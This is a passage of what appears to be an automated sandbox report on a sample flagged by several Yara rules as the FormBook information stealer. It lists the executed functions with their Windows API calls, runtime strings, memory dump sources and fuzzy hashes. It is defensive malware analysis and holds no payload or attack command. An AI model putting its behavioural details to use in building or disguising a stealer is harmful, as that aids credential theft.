Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.2%
Total number of Nodes:	775
Total number of Limit Nodes:	34

Executed Functions

Function 00007FF7D7861C90 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861C9F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861CDD
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861D09
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861D1A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861D29
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861DC0
GetProcessAffinityMask.KERNEL32 ref: 00007FF7D7861DD3

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: 2edd0ea12565daf2ef57f9e5ef2517f8d0825a42736cc96f23e10a000d657429
Instruction ID: 8b7a381e70eb257c3e63272cd4ce9280dd2c69df7b1a8d90964e69116032101c
Opcode Fuzzy Hash: 2edd0ea12565daf2ef57f9e5ef2517f8d0825a42736cc96f23e10a000d657429
Instruction Fuzzy Hash: 01519F32E18B4696EB04AF19E44056CABA1FF94785FC89033DA4D87765DF3CE516CB20

Function 00007FF7D7854F20 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7D785C020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7D7854F2F,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D785C02B
Part of subcall function 00007FF7D785C020: QueryInformationJobObject.KERNEL32 ref: 00007FF7D785C0FE

Part of subcall function 00007FF7D785BEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF7D7854F58,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D785BED1

RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7D7854FB4
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D785509E

Strings

TotalStressLogSize, xrefs: 00007FF7D7854FD5
The required instruction sets are not supported by the current CPU., xrefs: 00007FF7D785508A
StressLogLevel, xrefs: 00007FF7D7855010

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
API String ID: 2052584837-2841289747
Opcode ID: 768561c1732453832f70512f53520e79113a902b94bc6b21a69ce7dc6cf06a3b
Instruction ID: 6abc79acd4e0ddc5cd776e454ba34f1a83b576270c0ca55d5c86e64d15f60573
Opcode Fuzzy Hash: 768561c1732453832f70512f53520e79113a902b94bc6b21a69ce7dc6cf06a3b
Instruction Fuzzy Hash: 7B416C22E08A4281EA44BB65E8026BDEF92AF81744FC84077E94D176D6DF6CE427C771

Function 00007FF7D7869B70 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Creation of WaitForGCEvent failed, xrefs: 00007FF7D7869EF1
TraceGC is not turned on, xrefs: 00007FF7D7869B76

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
API String ID: 133006248-518909315
Opcode ID: bad778e28d8a45bf6e7987e1a07fa7a690c5c8ca1e9f6c2ddfbf13bc9afc39ea
Instruction ID: f72799340dd00ed598aed17beee7b33acce5e87a5540c63f5b59af3687608562
Opcode Fuzzy Hash: bad778e28d8a45bf6e7987e1a07fa7a690c5c8ca1e9f6c2ddfbf13bc9afc39ea
Instruction Fuzzy Hash: 50B18631E0DB8291FA09F729A41277DE695AF85780FD5813BE54E0A792DF2DF0638720

Function 00007FF7D78EC890 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 00007FF7D78EC906

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4be4e3624e991274f7be254f3aa2967b322d0ff590922d4aacb939f4e6e817f7
Instruction ID: 2b9db767cadb9d7a0d23239459d213ae4003631326567bc90e9948423a882499
Opcode Fuzzy Hash: 4be4e3624e991274f7be254f3aa2967b322d0ff590922d4aacb939f4e6e817f7
Instruction Fuzzy Hash: 3A217C33A14A419AD724EF65E8419EDABA4FB54398FD00137FE4E83A45DF38C562C350

Function 00007FF7D7882BA0 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: 22b253b4aa74282251440fc9b780e72d3e8ffc5989e91c34ac2406a1690f2cd1
Instruction ID: 164302336f3c8f051dcf81eb075c46d91f6f20abd06bcfa4d8c2e997321b7ab7
Opcode Fuzzy Hash: 22b253b4aa74282251440fc9b780e72d3e8ffc5989e91c34ac2406a1690f2cd1
Instruction Fuzzy Hash: F902E261E1864786FA19EB2DF444A3CEBE2AF85780FD48637D44D5B660DF3CB4938620

Function 00007FF7D7881480 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61c9812c9e7b6ae93f88a66611269828cd9fa7318153e82aea7bc9a853a16b4
Instruction ID: 80c7f14fb8d10541bfbf9e421d73ace5050eb57e2258e0bdd61dabed00a59b65
Opcode Fuzzy Hash: e61c9812c9e7b6ae93f88a66611269828cd9fa7318153e82aea7bc9a853a16b4
Instruction Fuzzy Hash: B3F1A421D1CB4385F649FB28E90167DE791AFD5384FD4833BD48D5A2A2EF2C74A38220

Function 00007FF7D7861840 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7D786188B
IsProcessInJob.KERNEL32 ref: 00007FF7D786189B
QueryInformationJobObject.KERNEL32 ref: 00007FF7D78618CB
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7D7861934
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7D7861973
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7D78619BC

Strings

@, xrefs: 00007FF7D7861968
@, xrefs: 00007FF7D786191C
@, xrefs: 00007FF7D78619B1

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: abc38f2d860003f317c18953adb200e7ee2010e1f29a2de66cf0452d54ba547c
Instruction ID: e4dbb4c7d988e57049b6b42e0423cf4f8f5d4384c1075f1fa2f011041b7b05ac
Opcode Fuzzy Hash: abc38f2d860003f317c18953adb200e7ee2010e1f29a2de66cf0452d54ba547c
Instruction Fuzzy Hash: 33418832B096C195EB619F11E5003ADF7A0F788B94FC48232DA9D57B98DF3CD4468B10

Function 00007FF7D785C020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7D7854F2F,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D785C02B

Part of subcall function 00007FF7D7861C90: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861C9F
Part of subcall function 00007FF7D7861C90: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861CDD
Part of subcall function 00007FF7D7861C90: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861D09
Part of subcall function 00007FF7D7861C90: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861D1A
Part of subcall function 00007FF7D7861C90: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D785C04A), ref: 00007FF7D7861D29

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF7D7854F2F,?,?,?,?,?,?,00007FF7D78524A0), ref: 00007FF7D785C09D
GetProcessAffinityMask.KERNEL32 ref: 00007FF7D785C0B0
QueryInformationJobObject.KERNEL32 ref: 00007FF7D785C0FE

Strings

PROCESSOR_COUNT, xrefs: 00007FF7D785C066

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
String ID: PROCESSOR_COUNT
API String ID: 1701933505-4048346908
Opcode ID: ef826ac04fc4a19e007b62f10dbe0eef8d0d379f5f649f9e54b36b8594525da1
Instruction ID: a29cf2d4ca661e7b422d70a008abfad67b185ac682d31be526bd0dc7d612befa
Opcode Fuzzy Hash: ef826ac04fc4a19e007b62f10dbe0eef8d0d379f5f649f9e54b36b8594525da1
Instruction Fuzzy Hash: 35318F35A08A4382EA54BB95D4802BDEBA1EF84798FC44037D64E47695DF6CE42ACB60

Function 00007FF7D7855CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF7D7855D75
RaiseFailFastException.KERNEL32(?,?,?,00007FF7D7917560), ref: 00007FF7D7855DA1
RaiseFailFastException.KERNEL32(?,?,?,00007FF7D7917560), ref: 00007FF7D7855DDA

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF7D7855DC6

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 4063b3a8f6f3b5a1a038142f0a251c20a697346811a2136d7d2502006c2daff7
Instruction ID: e22df2f4e5a538aeec1d58e4ecf5250e453fbfdec3ea5b96d0573488c765e6b9
Opcode Fuzzy Hash: 4063b3a8f6f3b5a1a038142f0a251c20a697346811a2136d7d2502006c2daff7
Instruction Fuzzy Hash: 71416132A19A4682EB94AF19E44977DB7A1FB44784FC4403BD95D43390DF3DE862C760

Function 00007FF7D785C280 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF7D785C2A1
SetThreadPriority.KERNELBASE ref: 00007FF7D785C2BD
ResumeThread.KERNELBASE ref: 00007FF7D785C2C6
FindCloseChangeNotification.KERNELBASE ref: 00007FF7D785C2CF

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
String ID:
API String ID: 2150560229-0
Opcode ID: 8c17f2b2cb10eca36320f715c2ee833929200994eb55eb200b78072db04ed17c
Instruction ID: def6a9ddcf8d571fb22929ecd13378e98b71e94fa03cfe5a279619c32975b88d
Opcode Fuzzy Hash: 8c17f2b2cb10eca36320f715c2ee833929200994eb55eb200b78072db04ed17c
Instruction Fuzzy Hash: EFE065A6B0470382FF14AF21B8153399760AF98B99FC84035CD4E07370EF3C91964A14

Function 00007FF7D7861660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7D7861697
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7D786175C

Strings

@, xrefs: 00007FF7D7861754

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: 78c5324b8b4970a7a2d3ba818398d0a008337d9560ba47b8fb669ae83f37390d
Instruction ID: ae8ae0cf7f39d45f96b47dcb2839a4903e1d532606d04d9c245d79619013a01a
Opcode Fuzzy Hash: 78c5324b8b4970a7a2d3ba818398d0a008337d9560ba47b8fb669ae83f37390d
Instruction Fuzzy Hash: 0741F332F19B4641E956DA36911133DD9926F49BC1FD8C232D90E67749FF3CE8A28610

Function 00007FF7D7867DCB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF7D7867E2E
GetTickCount64.KERNEL32 ref: 00007FF7D7867EB3

Strings

*, xrefs: 00007FF7D7867DFE, 00007FF7D7867E42, 00007FF7D7867E8B, 00007FF7D7867EC7

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Count64Tick
String ID: *
API String ID: 1927824332-3160374680
Opcode ID: 334c8dcc136a4e69ae5976e326fe444f0e7a228d039957ef6d32c780e2a605d3
Instruction ID: cb29ecb64f8e0436ac69b89741cccb3798b655917a05635d2e00ee877269fa24
Opcode Fuzzy Hash: 334c8dcc136a4e69ae5976e326fe444f0e7a228d039957ef6d32c780e2a605d3
Instruction Fuzzy Hash: 9D41C135E0968291FB68BB29D445A7DEB91AF80B84FC48433CA8D077A5DE3CF4578760

Function 00007FF7D7861F10 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7D78659F8,?,?,0000000A,00007FF7D7864A50,?,?,00000000,00007FF7D785E3E1), ref: 00007FF7D7861F37
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7D78659F8,?,?,0000000A,00007FF7D7864A50,?,?,00000000,00007FF7D785E3E1), ref: 00007FF7D7861F57
VirtualAllocExNuma.KERNEL32 ref: 00007FF7D7861F78

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: e471c0116db0289cdb5416b92aeb020048c5eee5d0ab365d752c002b20965939
Instruction ID: e3e87eb6c31ad87f490f70153b94d55a93c238f7ed5d63339e1f1c81c26d47e8
Opcode Fuzzy Hash: e471c0116db0289cdb5416b92aeb020048c5eee5d0ab365d752c002b20965939
Instruction Fuzzy Hash: 73F0C871B0869182EB209F06F40021DEB60BB49FD9F984139EF8C17B69CF3DC5928B00

Function 00007FF7D78BBE50 Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7D78BB485,?,?,?,?,00007FF7D7860501,?,?,?,00007FF7D7860A84,00000000,00000020,?), ref: 00007FF7D78BBE6A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7D78BBE80

Part of subcall function 00007FF7D78BC164: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7D78BC16D

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: fc9208e9307d9819ce329e0bb799ea45c8dc06ae776280f5117c823a9b7f6ef1
Instruction ID: cbd76e16e827ee386b115615fd61f0878610cbc19d082d70d00441993f11c470
Opcode Fuzzy Hash: fc9208e9307d9819ce329e0bb799ea45c8dc06ae776280f5117c823a9b7f6ef1
Instruction Fuzzy Hash: 87E0EC40E0950781F92876B214660BE9D404F84B70FD81732DA3E162E3EE1CB4B78230

Function 00007FF7D785C240 Relevance: 3.0, APIs: 2, Instructions: 18
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

